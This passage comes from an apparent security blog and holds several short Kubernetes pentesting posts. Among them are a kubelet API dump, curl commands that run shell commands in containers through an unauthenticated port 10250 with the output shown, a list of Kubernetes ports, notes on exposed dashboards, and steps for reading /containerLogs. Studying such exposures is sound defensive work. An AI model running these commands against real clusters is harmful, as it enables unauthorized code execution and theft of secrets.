<span style="font-family: "courier new" , "courier" , monospace;"> "apiVersion": "v1",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "metadata": {},</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "items": [</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "metadata": {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "name": "kube-dns-5b8bf6c4f4-k5n2g",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "generateName": "kube-dns-5b8bf6c4f4-",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "namespace": "kube-system",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "selfLink": "/api/v1/namespaces/kube-system/pods/kube-dns-5b8bf6c4f4-k5n2g",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "uid": "63438841-e43c-11e8-a104-42010a80038e",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "resourceVersion": "85366060",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "creationTimestamp": "2018-11-09T16:27:44Z",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "labels": {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "k8s-app": "kube-dns",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "pod-template-hash": "1646927090"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> },</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "annotations": {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "kubernetes.io/config.seen": "2018-11-09T16:27:44.990071791Z",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "kubernetes.io/config.source": "api",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "scheduler.alpha.kubernetes.io/critical-pod": ""</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> },</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "ownerReferences": [</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "apiVersion": "extensions/v1beta1",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "kind": "ReplicaSet",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "name": "kube-dns-5b8bf6c4f4",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "uid": "633db9d4-e43c-11e8-a104-42010a80038e",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "controller": true</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> }</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> ]</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> },</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "spec": {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "volumes": [</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "name": "kube-dns-config",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "configMap": {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "name": "kube-dns",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "defaultMode": 420</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> }</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> },</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "name": "kube-dns-token-xznw5",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "secret": {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "secretName": "kube-dns-token-xznw5",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "defaultMode": 420</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> }</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> }</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> ],</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "containers": [</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "name": "dnsmasq",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "image": "gcr.io/google-containers/k8s-dns-dnsmasq-nanny-amd64:1.14.10",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "args": [</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "-v=2",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "-logtostderr",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "-configDir=/etc/k8s/dns/dnsmasq-nanny",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "-restartDnsmasq=true",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "--",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "-k",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "--cache-size=1000",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "--no-negcache",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "--log-facility=-",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "--server=/cluster.local/127.0.0.1#10053",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "--server=/in-addr.arpa/127.0.0.1#10053",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "--server=/ip6.arpa/127.0.0.1#10053"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> ],</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "ports": [</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "name": "dns",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "containerPort": 53,</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "protocol": "UDP"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> },</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "name": "dns-tcp",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "containerPort": 53,</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "protocol": "TCP"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> }</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> ],</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "resources": {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "requests": {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "cpu": "150m",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "memory": "20Mi"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> }</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> },</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "volumeMounts": [</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "name": "kube-dns-config",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "mountPath": "/etc/k8s/dns/dnsmasq-nanny"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> },</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "name": "kube-dns-token-xznw5",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "readOnly": true,</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "mountPath": "/var/run/secrets/kubernetes.io/serviceaccount"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> }</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> ],</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "livenessProbe": {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "httpGet": {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "path": "/healthcheck/dnsmasq",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "port": 10054,</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "scheme": "HTTP"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> },</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "initialDelaySeconds": 60,</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "timeoutSeconds": 5,</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "periodSeconds": 10,</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "successThreshold": 1,</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "failureThreshold": 5</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> },</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "terminationMessagePath": "/dev/termination-log",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "imagePullPolicy": "IfNotPresent"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> },</span></div>
</div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> --------SNIP---------</span></div>
<div>
<br /></div>
<div>
With the output of the running pods command you can craft your command to do the code exec</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">$ curl -k -XPOST "https://k8s-node-1:10250/run/<namespace>/<podname>/<container-name>" -d "cmd=env"</container-name></podname></namespace></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="font-family: inherit;">as an example:</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioplz0x3icSps02JND9nZk7bjEey9ojuoGs5bnBaOrbw2O0mk0IHvE-AfyUItv8MYAZV0XsVPqmkeFlb3qicr6jh2hL_zH3BNht0JHnp0lfxj0qqal431vmkc51rczQh2b6a9Ycn5rsys/s1600/namespace-name+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="676" data-original-width="1408" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioplz0x3icSps02JND9nZk7bjEey9ojuoGs5bnBaOrbw2O0mk0IHvE-AfyUItv8MYAZV0XsVPqmkeFlb3qicr6jh2hL_zH3BNht0JHnp0lfxj0qqal431vmkc51rczQh2b6a9Ycn5rsys/s400/namespace-name+2.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKQ8yNcXo-oAiDWOGc28urTyNK4WVXKPpN2Le-j6E3UZsNoqoUy4lDSUD4hpL4EDdjKdRgNBR3C2-QEMbvZNCLeWK_DyylDNNuGFba6Bgr6buLg6fLWe1knMPPfR-FCYY1ieAoJta5Asw/s1600/container-name+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="572" data-original-width="1510" height="151" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKQ8yNcXo-oAiDWOGc28urTyNK4WVXKPpN2Le-j6E3UZsNoqoUy4lDSUD4hpL4EDdjKdRgNBR3C2-QEMbvZNCLeWK_DyylDNNuGFba6Bgr6buLg6fLWe1knMPPfR-FCYY1ieAoJta5Asw/s400/container-name+2.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
leaves you with:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">curl -k -XPOST "https://kube-node-here:10250/run/kube-system/kube-dns-5b8bf6c4f4-k5n2g/dnsmasq" -d "cmd=ls -la /"</span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">total 35264</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 1 root root 4096 Nov 9 16:27 .</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 1 root root 4096 Nov 9 16:27 ..</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">-rwxr-xr-x 1 root root 0 Nov 9 16:27 .dockerenv</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 2 root root 4096 Nov 9 16:27 bin</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 5 root root 380 Nov 9 16:27 dev</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">-rwxr-xr-x 1 root root 36047205 Apr 13 2018 dnsmasq-nanny</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 1 root root 4096 Nov 9 16:27 etc</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 2 root root 4096 Jan 9 2018 home</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 5 root root 4096 Nov 9 16:27 lib</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 5 root root 4096 Nov 9 16:27 media</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 2 root root 4096 Jan 9 2018 mnt</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">dr-xr-xr-x 125 root root 0 Nov 9 16:27 proc</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwx------ 2 root root 4096 Jan 9 2018 root</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 2 root root 4096 Jan 9 2018 run</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 2 root root 4096 Nov 9 16:27 sbin</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 2 root root 4096 Jan 9 2018 srv</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">dr-xr-xr-x 12 root root 0 Nov 9 16:27 sys</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxrwxrwt 1 root root 4096 Nov 9 17:00 tmp</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 7 root root 4096 Nov 9 16:27 usr</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 1 root root 4096 Nov 9 16:27 var</span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-44332582894145729622019-01-14T16:31:00.001-05:002019-01-14T16:31:05.375-05:00Kubernetes: List of ports<span style="font-family: inherit;">Other Kubernetes ports</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<div style="background-color: white; box-sizing: border-box; color: #333333; margin-bottom: 10px;">
<span style="box-sizing: border-box; font-family: inherit;">What are some of the visible ports used in Kubernetes?</span><br />
<div style="font-size: 14px;">
<span style="font-family: inherit;"><br /></span></div>
</div>
<div style="background-color: white; box-sizing: border-box; color: #333333; margin-bottom: 10px;">
<ul>
<li><span style="font-family: inherit;">44134/tcp - Helmtiller, weave, calico</span></li>
<li><span style="box-sizing: border-box; font-family: inherit;">10250/tcp - kubelet (kublet exploit)</span></li>
<ul>
<li><span style="font-family: inherit;">No authN, completely open</span></li>
<li><span style="font-family: inherit;">/pods</span></li>
<li><span style="font-family: inherit;">/runningpods</span></li>
<li><span style="font-family: inherit;">/containerLogs</span></li>
</ul>
<li><span style="box-sizing: border-box; font-family: inherit;">10255/tcp - kublet port (read-only)</span></li>
<ul>
<li><span style="box-sizing: border-box; font-family: inherit;">/stats</span></li>
<li><span style="box-sizing: border-box; font-family: inherit;">/metrics</span></li>
<li><span style="box-sizing: border-box; font-family: inherit;">/pods</span></li>
</ul>
<li><span style="box-sizing: border-box; font-family: inherit;">4194/tcp - cAdvisor</span></li>
<li><span style="box-sizing: border-box; font-family: inherit;">2379/tcp - etcd (see it on other ports though)</span></li>
<ul>
<li><span style="font-family: inherit;">Etcd holds all the configs</span></li>
<li><span style="font-family: inherit;">Config storage</span></li>
</ul>
<li><span style="font-family: inherit;">30000 - dashboard</span></li>
<li><span style="font-family: inherit;">443/6443 - api</span></li>
</ul>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-39203133072026638332019-01-11T09:00:00.001-05:002019-01-11T09:00:00.434-05:00Kubernetes: Kubernetes Dashboard<br />
Tesla was <a href="https://arstechnica.com/information-technology/2018/02/tesla-cloud-resources-are-hacked-to-run-cryptocurrency-mining-malware/" target="_blank">famously hacked</a> for leaving this open and it's pretty rare to find it exposed externally now but useful to know what it is and what you can do with it.<br />
<br />
Usually found on port 30000<br />
<br />
kube-hunter finding for it:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">Vulnerabilities</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+-----------------------+---------------+----------------------+----------------------+------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| LOCATION | CATEGORY | VULNERABILITY | DESCRIPTION | EVIDENCE |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+-----------------------+---------------+----------------------+----------------------+------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| 1.2.3.4:30000 | Remote Code | Dashboard Exposed | All oprations on the | nodes: pach-okta |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | Execution | | cluster are exposed | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+-----------------------+---------------+----------------------+----------------------+------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;"><br /></span><span style="font-family: inherit; font-size: xx-small;">Why do you care? It has access to all pods and secrets within the cluster. So rather than using command line tools to get secrets or run code you can just do it in a web browser.</span><br />
<span style="font-family: inherit; font-size: xx-small;"><br /></span>
<span style="font-family: inherit; font-size: xx-small;">Screenshots of what it looks like:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3JaFvtiX2Ga4sDigrVm69aiM1baUFjuNPh2zW3QElozlBNbLOW2nlEb3tV7z4dDnVHDU4NUaclewHrr2-Lb4jlfqs5vkFJMQQ8NNYtCLF26UZAhxRvWl41ZJLeTnERCT0E3ZjkU4Jf48/s1600/dashboard1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1008" data-original-width="1600" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3JaFvtiX2Ga4sDigrVm69aiM1baUFjuNPh2zW3QElozlBNbLOW2nlEb3tV7z4dDnVHDU4NUaclewHrr2-Lb4jlfqs5vkFJMQQ8NNYtCLF26UZAhxRvWl41ZJLeTnERCT0E3ZjkU4Jf48/s320/dashboard1.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
viewing secrets</div>
<span style="font-family: inherit; font-size: xx-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://d33wubrfki0l68.cloudfront.net/349824f68836152722dab89465835e604719caea/6e0b7/images/docs/ui-dashboard.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="478" data-original-width="800" height="238" src="https://d33wubrfki0l68.cloudfront.net/349824f68836152722dab89465835e604719caea/6e0b7/images/docs/ui-dashboard.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
utilization</div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://d33wubrfki0l68.cloudfront.net/767cfea1ac5847b732e40ddd1ea13e638b679f8f/7be79/images/docs/ui-dashboard-logs-view.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="478" data-original-width="800" height="238" src="https://d33wubrfki0l68.cloudfront.net/767cfea1ac5847b732e40ddd1ea13e638b679f8f/7be79/images/docs/ui-dashboard-logs-view.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
logs</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://user-images.githubusercontent.com/608862/29508542-d7e67470-864c-11e7-838c-90bbb9c09daa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="315" data-original-width="800" height="156" src="https://user-images.githubusercontent.com/608862/29508542-d7e67470-864c-11e7-838c-90bbb9c09daa.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
shells</div>
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-4147282203286078582019-01-11T09:00:00.000-05:002019-01-11T09:00:03.332-05:00Kubernetes: Kubelet API containerLogs endpoint<br />
<span style="font-family: inherit;">How to get the info that kube-hunter reports for open /containerLogs endpoint</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">Vulnerabilities</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+---------------+-------------+------------------+----------------------+----------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| LOCATION CATEGORY | VULNERABILITY | DESCRIPTION | EVIDENCE |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+---------------+-------------+------------------+----------------------+----------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+----------------+------------+------------------+----------------------+----------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| 1.2.3.4:10250 | Information | Exposed Container| Output logs from a | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | Disclosure | Logs | running container | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | are using the | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | exposed | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | /containerLogs | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | endpoint | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+---------------+-------------+------------------+----------------------+----------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;"><br /></span>
<span style="font-family: inherit;">First step, grab the output from /runningpods/ example below:</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ3E2BnNu1hnCtVNUsb2jQhi_ZgzFFpg-2ZRfosj7SpmINjD8SHNPwr0eYj-s2RwpMroCyt2Yyxo96QakAqfuCORZQeqgGa2wfgrpGP3kQJTOuZRb0vtjqUOR-2hNzBZ7k87a490l5yNM/s1600/runningpods.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="483" data-original-width="1600" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ3E2BnNu1hnCtVNUsb2jQhi_ZgzFFpg-2ZRfosj7SpmINjD8SHNPwr0eYj-s2RwpMroCyt2Yyxo96QakAqfuCORZQeqgGa2wfgrpGP3kQJTOuZRb0vtjqUOR-2hNzBZ7k87a490l5yNM/s640/runningpods.png" width="640" /></a></div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">You'll need the <i>namespace</i>, <i>pod name </i>and <i>container name</i>.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Thus given the below runningpods output:</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<pre style="overflow-wrap: break-word; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;">{"metadata":{"name":"<b>monitoring-influxdb-grafana-v4-6679c46745-zhvjw</b>","namespace":"<b>kube-system</b>","uid":"0d22cdad-06e5-11e9-a7f3-6ac885fbc092","creationTimestamp":null},"spec":{"containers":[{"name":"<b>grafana</b>","image":"sha256:8cb3de219af7bdf0b3ae66439aecccf94cebabb230171fa4b24d66d4a786f4f7","resources":{}},{"name":"<b>influxdb</b>","image":"sha256:577260d221dbb1be2d83447402d0d7c5e15501a89b0e2cc1961f0b24ed56c77c","resources":{}}]},</span></pre>
<pre style="overflow-wrap: break-word; white-space: pre-wrap;"></pre>
<pre style="overflow-wrap: break-word; white-space: pre-wrap;"><span style="font-family: inherit;">
</span></pre>
<pre style="overflow-wrap: break-word; white-space: pre-wrap;"><span style="font-family: Times, Times New Roman, serif;">turns into:</span></pre>
<pre style="overflow-wrap: break-word; white-space: pre-wrap;"><span style="font-family: inherit;">
</span></pre>
<pre style="overflow-wrap: break-word; white-space: pre-wrap;"></pre>
<pre style="overflow-wrap: break-word;"><span style="white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;">https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/grafana</span></span></pre>
<pre style="overflow-wrap: break-word;"><span style="white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;">
</span></span></pre>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkVeMMHhBhT-H6kczphaOnyBcUHB5Dg6OKvhAdkwBUvlV8DocP_xQs4-8AXMP6V_1h9q_efjhbVLEGTRJnQyYSCdsOWnUtPgkoqjzdJ0QLuUBzNavIuSfjdN1l4LaSILKPAkjQsWTCuL4/s1600/grafana.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="580" data-original-width="1600" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkVeMMHhBhT-H6kczphaOnyBcUHB5Dg6OKvhAdkwBUvlV8DocP_xQs4-8AXMP6V_1h9q_efjhbVLEGTRJnQyYSCdsOWnUtPgkoqjzdJ0QLuUBzNavIuSfjdN1l4LaSILKPAkjQsWTCuL4/s640/grafana.png" width="640" /></a></div>
<pre style="overflow-wrap: break-word;"><span style="white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;">
</span></span></pre>
<pre style="overflow-wrap: break-word;"><span style="white-space: pre-wrap;"><span style="font-family: Times, Times New Roman, serif;">and</span></span></pre>
<pre style="overflow-wrap: break-word;"><span style="white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;">
</span></span></pre>
<pre style="overflow-wrap: break-word;"><span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre-wrap;">https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/influxdb</span></span></pre>
<pre style="overflow-wrap: break-word;"><span style="white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;">
</span></span></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZr-SXC0SggoBSlNutC1NLZPifxTukWARGBKWty_4Zi8EZ7R31_YYSVcRO3lNhuUOSYu3XSWvI8FD1xIV6MznYnrUAasrfqTAsq4HAGRNrCKw_-qiEOoieFP3ibA0MKIl-Wo2ibYdQKpY/s1600/influxdb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="842" data-original-width="1600" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZr-SXC0SggoBSlNutC1NLZPifxTukWARGBKWty_4Zi8EZ7R31_YYSVcRO3lNhuUOSYu3XSWvI8FD1xIV6MznYnrUAasrfqTAsq4HAGRNrCKw_-qiEOoieFP3ibA0MKIl-Wo2ibYdQKpY/s640/influxdb.png" width="640" /></a></div>
<span style="font-family: inherit;"><br /></span>
